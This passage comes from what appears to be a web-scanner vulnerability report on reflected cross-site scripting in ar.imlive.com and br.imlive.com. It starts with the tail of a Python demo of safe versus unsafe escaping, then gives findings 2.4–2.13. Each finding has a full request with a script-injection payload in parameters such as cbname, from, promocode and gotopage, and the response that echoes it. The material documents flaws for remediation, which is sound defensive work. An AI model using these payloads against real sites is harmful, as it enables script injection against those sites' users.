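    return ONCLICK_TEMPLATE.replace("__VALUE__", encoded)


def render_script_unsafe(value: str) -> str:
    """Raw reflection, as in the captured response for 2.3."""
    return SCRIPT_TEMPLATE.replace("__VALUE__", value)


def render_script_safe(value: str) -> str:
    """Single context (JS string), so one layer of escaping is enough."""
    return SCRIPT_TEMPLATE.replace("__VALUE__", js_string_escape(value))


def adds_markup(template: str, rendered: str) -> bool:
    """True if the reflected value introduced structure-changing characters:
    a '<' or '"' beyond what the template has, or an extra single quote
    that would terminate the JS string."""
    return any(rendered.count(c) > template.count(c) for c in "<\"'")


if __name__ == "__main__":
    p21 = '94ad3"><ScRiPt>alert(1)</ScRiPt>4f479a42c47'   # payload from 2.1
    p23 = "5b3ce'-alert(1)-'6c601d061a"                    # payload from 2.3
    print("blacklist passes case-varied payload:", blacklist_allows(p21))
    print("2.1 unsafe breaks out:", adds_markup(ONCLICK_TEMPLATE, render_onclick_unsafe(p21)))
    print("2.1 safe breaks out:  ", adds_markup(ONCLICK_TEMPLATE, render_onclick_safe(p21)))
    print("2.3 unsafe breaks out:", adds_markup(SCRIPT_TEMPLATE, render_script_unsafe(p23)))
    print("2.3 safe breaks out:  ", adds_markup(SCRIPT_TEMPLATE, render_script_safe(p23)))
```

The order of the two encodings in render_onclick_safe is the point most often got wrong: the browser undoes the HTML attribute encoding first, then hands the result to the JavaScript parser, so the encoding applied last in the server must be the one the browser removes first.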

Request

GET /?5b3ce'-alert(1)-'6c601d061a=1 HTTP/1.1
Host: ar.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=vc4twg45dvbaxrjcyazsha21; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=vc4twg45dvbaxrjcyazsha21; path=/; HttpOnly
Set-Cookie: spvdr=vd=403fb166-4a3b-49a4-b9e2-7da3ff9f4dd9&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:16:45 GMT; path=/
Set-Cookie: iar=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:16:45 GMT
Connection: close
Content-Length: 19131
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es-AR" lang="es-AR" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815903&ud=0&pe=/homepage.aspx&he=ar.imlive.com&ul=/?5b3ce'-alert(1)-'6c601d061a=1&qs=5b3ce'-alert(1)-'6c601d061a=1&qs=5b3ce'-alert(1)-'6c601d061a=1&iy=dallas&id=44&iu=1&vd=403fb166-4a3b-49a4-b9e2-7da3ff9f4dd9';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEv
...[SNIP]...

2.4. http://ar.imlive.com/waccess/ [cbname parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ar.imlive.com
Path:   /waccess/

Issue detail

The value of the cbname request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5f889"><script>alert(1)</script>305652e0e15 was submitted in the cbname parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=5f889"><script>alert(1)</script>305652e0e15&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: ar.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: spvdr=vd=fc1f7965-56a7-4e4d-8aed-9844cc5adf9a&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerlanguage.imlive.com=2215904834.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; iar=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; __utmc=71081352; ASP.NET_SessionId=fqzehq45mvboz255wmce5e45;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: iar=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9Y%2fR%2bGvCxXwJU5%2bck1BGx0vHozqb2ncqSVUovdihc4iQ%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 16:44:36 GMT
Connection: close
Content-Length: 23511


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es-AR" lang="es-AR" d
...[SNIP]...
<a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=5f889"><script>alert(1)</script>305652e0e15&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/');return false;">
...[SNIP]...

2.5. http://ar.imlive.com/waccess/ [from parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ar.imlive.com
Path:   /waccess/

Issue detail

The value of the from request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 650a2"><script>alert(1)</script>068f5418f8 was submitted in the from parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=650a2"><script>alert(1)</script>068f5418f8&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: ar.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: spvdr=vd=fc1f7965-56a7-4e4d-8aed-9844cc5adf9a&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerlanguage.imlive.com=2215904834.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; iar=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; __utmc=71081352; ASP.NET_SessionId=fqzehq45mvboz255wmce5e45;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: iar=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9Y%2fR%2bGvCxXwJU5%2bck1BGx0vHozqb2ncqSVUovdihc4iQ%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 16:44:40 GMT
Connection: close
Content-Length: 23490


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es-AR" lang="es-AR" d
...[SNIP]...
<a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=650a2"><script>alert(1)</script>068f5418f8&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/');return false;">
...[SNIP]...

2.6. http://ar.imlive.com/waccess/ [promocode parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ar.imlive.com
Path:   /waccess/

Issue detail

The value of the promocode request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 43d88"><script>alert(1)</script>5d1a3a1c243 was submitted in the promocode parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /waccess/?wid=124669500825&promocode=YZSUSA558343d88"><script>alert(1)</script>5d1a3a1c243&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: ar.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: spvdr=vd=fc1f7965-56a7-4e4d-8aed-9844cc5adf9a&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerlanguage.imlive.com=2215904834.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; iar=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; __utmc=71081352; ASP.NET_SessionId=fqzehq45mvboz255wmce5e45;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: iar=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9Y%2fR%2bGvCxXwJU5%2bck1BGx0vHozqb2ncqSVUovdihc4iQ%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 16:44:33 GMT
Connection: close
Content-Length: 23511


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es-AR" lang="es-AR" d
...[SNIP]...
<a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/waccess/?wid=124669500825&promocode=YZSUSA558343d88"><script>alert(1)</script>5d1a3a1c243&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/');return false;">
...[SNIP]...

2.7. http://br.imlive.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://br.imlive.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 34723"><a>3f71d325883 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /?34723"><a>3f71d325883=1 HTTP/1.1
Host: br.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=u0zu13bemdfyxq455qlm1uml; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=u0zu13bemdfyxq455qlm1uml; path=/; HttpOnly
Set-Cookie: spvdr=vd=04dc6090-bd1f-4d6e-bf28-729633a25e9a&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:16:51 GMT; path=/
Set-Cookie: ibr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:16:51 GMT
Connection: close
Content-Length: 18835
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="pt-PT" lang="pt-PT" d
...[SNIP]...
<a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/uaccess/0/||34723"><a>3f71d325883~1');return false;">
...[SNIP]...

2.8. http://br.imlive.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://br.imlive.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3a910'-alert(1)-'8200d22e901 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?3a910'-alert(1)-'8200d22e901=1 HTTP/1.1
Host: br.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=uvklmduf1vd4t1rxzfvo2g45; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=uvklmduf1vd4t1rxzfvo2g45; path=/; HttpOnly
Set-Cookie: spvdr=vd=b00d0ff4-12cf-4179-8b1b-240f4a4d01b6&sgid=0&tid=0; expires=Sat, 28-Jan-2012 14:16:53 GMT; path=/
Set-Cookie: ibr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:16:52 GMT
Connection: close
Content-Length: 19010
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="pt-PT" lang="pt-PT" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107815903&ud=0&pe=/homepage.aspx&he=br.imlive.com&ul=/?3a910'-alert(1)-'8200d22e901=1&qs=3a910'-alert(1)-'8200d22e901=1&qs=3a910'-alert(1)-'8200d22e901=1&iy=dallas&id=44&iu=1&vd=b00d0ff4-12cf-4179-8b1b-240f4a4d01b6';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attach
...[SNIP]...

2.9. http://br.imlive.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://br.imlive.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6051e"><script>alert(1)</script>af1af9033d9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?6051e"><script>alert(1)</script>af1af9033d9=1 HTTP/1.1
Host: br.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: spvdr=vd=4fe45243-c119-4c27-af24-3a1035e21f79&sgid=0&tid=0; __utmz=90051912.1296227188.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/10; BIGipServerlanguage.imlive.com=2215904834.20480.0000; ibr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; __utma=90051912.2015373959.1296227188.1296227188.1296227188.1; __utmc=90051912; __utmb=90051912.1.10.1296227188; ASP.NET_SessionId=robavyerei5nryejqqx3qs45;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: ibr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 16:44:58 GMT
Connection: close
Content-Length: 21217


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="pt-PT" lang="pt-PT" d
...[SNIP]...
<a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/?6051e"><script>alert(1)</script>af1af9033d9=1');return false;">
...[SNIP]...

2.10. http://br.imlive.com/waccess/ [cbname parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://br.imlive.com
Path:   /waccess/

Issue detail

The value of the cbname request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6113a"><script>alert(1)</script>fb907eb99cc was submitted in the cbname parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=6113a"><script>alert(1)</script>fb907eb99cc&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: br.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: spvdr=vd=4fe45243-c119-4c27-af24-3a1035e21f79&sgid=0&tid=0; __utmz=90051912.1296227188.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/10; BIGipServerlanguage.imlive.com=2215904834.20480.0000; ibr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; __utma=90051912.2015373959.1296227188.1296227188.1296227188.1; __utmc=90051912; __utmb=90051912.1.10.1296227188; ASP.NET_SessionId=robavyerei5nryejqqx3qs45;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: ibr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9Y%2fR%2bGvCxXwJU5%2bck1BGx0vHozqb2ncqSVUovdihc4iQ%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 16:45:10 GMT
Connection: close
Content-Length: 23409


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="pt-PT" lang="pt-PT" d
...[SNIP]...
<a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=6113a"><script>alert(1)</script>fb907eb99cc&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/');return false;">
...[SNIP]...

2.11. http://br.imlive.com/waccess/ [from parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://br.imlive.com
Path:   /waccess/

Issue detail

The value of the from request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d687a"><script>alert(1)</script>9d2e569021a was submitted in the from parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=d687a"><script>alert(1)</script>9d2e569021a&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: br.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: spvdr=vd=4fe45243-c119-4c27-af24-3a1035e21f79&sgid=0&tid=0; __utmz=90051912.1296227188.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/10; BIGipServerlanguage.imlive.com=2215904834.20480.0000; ibr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; __utma=90051912.2015373959.1296227188.1296227188.1296227188.1; __utmc=90051912; __utmb=90051912.1.10.1296227188; ASP.NET_SessionId=robavyerei5nryejqqx3qs45;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: ibr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9Y%2fR%2bGvCxXwJU5%2bck1BGx0vHozqb2ncqSVUovdihc4iQ%3d; path=/
X-Powered-By: vsrv32
Date: Fri, 28 Jan 2011 16:45:16 GMT
Connection: close
Content-Length: 23409


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="pt-PT" lang="pt-PT" d
...[SNIP]...
<a class="StaticLink" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=d687a"><script>alert(1)</script>9d2e569021a&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/');return false;">
...[SNIP]...

2.12. http://br.imlive.com/waccess/ [gotopage parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://br.imlive.com
Path:   /waccess/

Issue detail

The value of the gotopage request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 661d9'style%3d'x%3aexpression(alert(1))'99e183046e6 was submitted in the gotopage parameter. This input was echoed as 661d9'style='x:expression(alert(1))'99e183046e6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=661d9'style%3d'x%3aexpression(alert(1))'99e183046e6 HTTP/1.1
Host: br.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:17:02 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ix=k; path=/
Set-Cookie: ibr=3hJF2uAprPZVGf42Zwr0ekr2sY1ahZftnoTx9yuEyyIqvJvUlzC7C5ClUj1mImMy0aC%2BOSFmyeUpZNslxkObl7I0cWS0PuZU%2FREf%2ByHeMVk%3D; path=/
Set-Cookie: ASPSESSIONIDSQSSRDRC=BDNHCJMAKNOJHLDBKMBBNOGJ; path=/
X-Powered-By: web13
Date: Fri, 28 Jan 2011 14:17:02 GMT
Connection: close
Content-Length: 8329
Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/


<HTML>
<HEAD>
<meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5">
<title>ImLive.com - Page Not Found</title>

<link rel="stylesheet" type="text/css" href="http
...[SNIP]...
<img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=br.imlive.com&ul=/waccess/661d9'style='x:expression(alert(1))'99e183046e6/&lr=1107815903&ud=0&pe=404.asp&qs=404;http://br.imlive.com:80/waccess/661d9'style='x:expression(alert(1))'99e183046e6/&sr=0&id=0&iu=1' height='1' width='1'>
...[SNIP]...

2.13. http://br.imlive.com/waccess/ [promocode parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://br.imlive.com
Path:   /waccess/

Issue detail

The value of the promocode request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cfad6"><script>alert(1)</script>6b350e8e83c was submitted in the promocode parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /waccess/?wid=124669500825&promocode=YZSUSA5583cfad6"><script>alert(1)</script>6b350e8e83c&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1
Host: br.imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: spvdr=vd=4fe45243-c119-4c27-af24-3a1035e21f79&sgid=0&tid=0; __utmz=90051912.1296227188.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/10; BIGipServerlanguage.imlive.com=2215904834.20480.0000; ibr=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d; __utma=90051912.2015373959.1296227188.1296227188.1296227188.1; __utmc=90051912; __utmb=90051912.1.10.1296227188; ASP.NET_SessionId=robavyerei5nryejqqx3qs45;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
